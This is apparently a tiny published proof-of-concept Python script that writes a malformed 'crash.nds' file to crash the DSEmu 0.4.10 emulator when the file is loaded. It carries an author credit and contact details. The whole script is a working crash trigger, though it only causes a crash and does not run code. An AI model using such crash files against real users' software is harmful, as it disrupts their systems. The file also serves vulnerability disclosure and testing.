1 2 3 4 5 6 7 8 9 10 11 |
#!/usr/bin/env python #DSEmu 0.4.10 (.nds) local crash #Author: l3D #Sites: http://xraysecurity.blogspot.com, http://nullbyte.org.il #IRC: irc://irc.nix.co.il #Email: pupipup33@gmail.com blah=open('crash.nds', 'w') blah.write('w00t'*12) blah.close() |